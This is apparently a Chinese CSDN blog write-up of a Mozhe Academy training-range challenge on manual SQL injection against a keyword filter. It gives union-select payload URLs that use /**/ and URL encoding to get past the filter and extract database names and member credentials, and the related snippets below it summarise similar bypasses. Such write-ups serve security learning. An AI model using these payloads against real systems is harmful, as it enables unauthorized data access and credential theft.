墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)

最新推荐文章于 2024-05-19 18:10:52 发布
最新推荐文章于 2024-05-19 18:10:52 发布
阅读量2.6k 收藏
点赞数
分类专栏: sql Mozhe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/82885533
版权
Mozhe 同时被 2 个专栏收录
50 篇文章 2 订阅
订阅专栏
sql
21 篇文章 3 订阅
订阅专栏

一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了;

(过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧)

和以往的套路一样,猜得到字段是4个。。。

http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4

url编码构造如下

2.png

 

md这墨者真的是有毒,就不能一个个写清楚嘛??!

3.png

 

 

 

 

http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/2,1

url编码构造

自己构造去,写成这样够給意思了

 

多崎巡礼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者靶场-SQL过滤字符手工注入漏洞测试(第1)
shy的博客
11-15 289
墨者学习 By/shy014 进去首页又看到熟悉的公告 通过简单的测试,确定存在sql注入漏洞,但是输入and 1=1 ,and 1=2,order by,union select ,and都没...
墨者-SQL过滤字符手工注入漏洞测试(第1)
zr1213159840的博客
12-10 835
和以前的简单目一样,看目的提示以及自己的测试知道过滤了=,–+,空格符号。等于可以使用like进行替代,空格可以使用/**/进行替代。最主要的,感觉目给了误解,没有说准确,目说url加密,但是经过测试直接选在网上选择url加密的链接并不行,最后测试是url网址16进制加密才可以,链接如下 url16进制加密 下面开始正式步骤: 首先是测试是否存在注入,将id=1改成id=2,没得显示,可能存在漏洞。 然后我们再测试下id=1 and 1=1和and 1=2行不行,需要注意的是,需要对空格以及=进
墨者学院(POST注入
2301_77578012的博客
05-19 427
使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具。发现存在注入点,并且给出了我们具体执行的payload格式。(如果大家对工具有需求的话可以q我哈)参数后所跟数据也可以通过抓包获取。1.墨者靶场(POST注入)2.sqlmap工具(主要)3.burpsuite工具。,在需要测试参数后加。
墨者学院----SQL过滤字符手工注入漏洞测试(第1)
qq_43590351的博客
01-22 430
SQL过滤字符手工注入漏洞测试(第1) 按照基本流程我们在url中输入单引号报错,说明存在SQL注入,但是在输入order by union select发现页面 保持正常,有可能我们输入的字符过滤 过滤的"="号可以利用like代替,空格用==/**/==代替 判断字段数 /**/order/**/by/**/4 介绍一个在线的url编码解码网站 http://web.chacuo.net/charseturlencode 由于被过滤所以我们要进行url的编码。%2f%2a%2a%2f%6f%7
墨者学院-SQL过滤字符手工注入漏洞测试(第1)
weixin_38131137的博客
03-01 147
一试验就清楚是被过滤了,在这里有几点提示的 1、如果是空格、=的过滤,用/**/ 与 like替换 2、这里里面有坑,百度后才发现,url编码存在简单模式和复杂模式 3、下载个小葵,或者用编码网站http://web.chacuo.net/charseturlencode 4、后续发现再补 ...
墨者学院SQL过滤字符手工注入漏洞测试
没事我溜达
03-16 1200
靶场地址: SQL过滤字符手工注入漏洞测试(第1)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。 今天来学习墨者学院中的字符过滤靶场 我们打开靶场 我们进到靶场看到一个登录页面 看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来.. 然后仔细看到下方有个导航条我我们点进去 注意看这个URL,我就怀疑注入点在这里,然后打开.
墨者学院----SQL过滤字符手工注入漏洞测试(第2)
qq_43590351的博客
01-26 406
SQL过滤字符手工注入漏洞测试(第2) 按照基本流程我们在url中输入单引号报错,说明存在SQL注入。直接输入order by发现页面异常,可能被过滤 尝试利用like等于号和==/**/空格==进行绕过 ?id=1/**/order/**/by/**/4 页面正常说明字段数为4 接下来利用联合查询,看是否有回显点 ...
墨者学院-----SQL过滤字符手工注入漏洞测试(第3)
qq_43590351的博客
01-28 256
SQL过滤字符手工注入漏洞测试(第3) 按照正常流程,首先在url中输入单引号发现报错,接着输入–+发现页面正常 此url种存在着字符注入 第一步判断字段数 利用order by进行判断,发现字段数是7 ?id=1' order by 7 --+ 查找回显点 ?id=-1' union select 1,2,3,4,5,6, 7 --+ http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,2,3,4,5,6, 7 --+
墨者学院-SQL过滤字符手工注入漏洞测试(第2)
m0_46684679的博客
12-03 391
SQL过滤字符手工注入漏洞测试(第2)
墨者学院SQL过滤字符手工注入漏洞测试(第3)
没事我溜达
03-20 3055
靶场地址:SQL过滤字符手工注入漏洞测试(第3)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 我们进入靶场(这次总算是不一样的了) 首先判断注入 我们在后面加入一个单引号,发现页面报错 能做到这个靶场的都不是新手,我就不说为什么报错了,我们在后面加上注释符,即可完成闭合,使得页面显示正常 然后order by判断列数,在第8列页面不回显,那么判断数据库有7列数据 判断回显位置 查询数据库名 http://1...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
1. **墨者靶场**:提供了黑盒和白盒环境下的命令执行与代码执行漏洞模拟,帮助测试和学习漏洞利用和防御。 2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求...
墨者学院 - SQL注入漏洞测试(POST)
多崎巡礼的博客
08-20 5347
和最开始拿到sql注入不一样,注入点不再是公告了,二是登陆页面的账号栏,简单的语句就能得到错误回显 根据目提示,post请求 1)随便输入用户名和密码,然后使用 burp抓取登录界面的post包,保存为txt; 2)将txt放在sqlmap目录下; 3)打开sqlmap,使用post注入sqlmap.py -r 文件路径/文件名 --dbs  //证明可以注入,且获取所有数据库名...
墨者学院 - SQL注入漏洞测试(参数加密)
多崎巡礼的博客
09-28 2502
list.php 御剑扫描得到   http://219.153.49.228:48291/news/list.zip 解压得到源码 从decode方法可知:AES的数据块长度为128位,密钥为ydhaqPQnexoaDuW3,偏移量为2018201920202021,填充为zeropadding 第八行 :判断网页id后面的查询字符串值,先两次base64解密,再AES解密,删除_mo...
墨者学院 - Apache Struts2系列
多崎巡礼的博客
01-11 2483
文章目录struct2-001struct2-004struct2-007struct2-008struct2-009 struct2-001 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执...
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值